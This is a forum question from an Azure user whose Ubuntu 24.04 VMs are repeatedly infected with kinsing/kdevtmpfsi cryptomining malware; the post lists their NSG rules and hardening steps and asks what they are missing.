Ubuntu VM repeatedly compromised with mining malware on Azure

I'm experiencing a critical security issue where every Ubuntu 24.04 VM I create on Azure gets compromised with cryptocurrency mining malware within 30 minutes. Setup: - Region: UAE North - OS: Ubuntu 24.04 LTS - SSH port changed to 2222 - Password auth disabled - NSG rules: SSH only from specific IPs (my laptop + Jenkins server) - Ports 80/443 public for web app Issue: - Mining processes (kdevtmpfsi, kinsing) appear - Unauthorized SSH keys added - Cron jobs created for persistence - Happens consistently across fresh deployments Security measures taken: - SSH keys only (no password) - Custom SSH port (2222) - Restricted NSG rules - fail2ban installed - UFW configured NSG Configuration: - Rule 110: SSH (2222) from my IP (my-ip/32) - Rule 140: SSH (2222) from Jenkins (jenkins-ip/32) - Rule 120: HTTP (80) from Any - Rule 130: HTTPS (443) from Any Questions: 1. Is there a vulnerability in this NSG configuration? 2. Could Jenkins server () be compromised? 3. What's the recommended security architecture for CI/CD + public web app? 4. Are there Azure-specific security measures I'm missing? I've checked auth logs, activity logs, and followed security best practices but still experiencing this issue.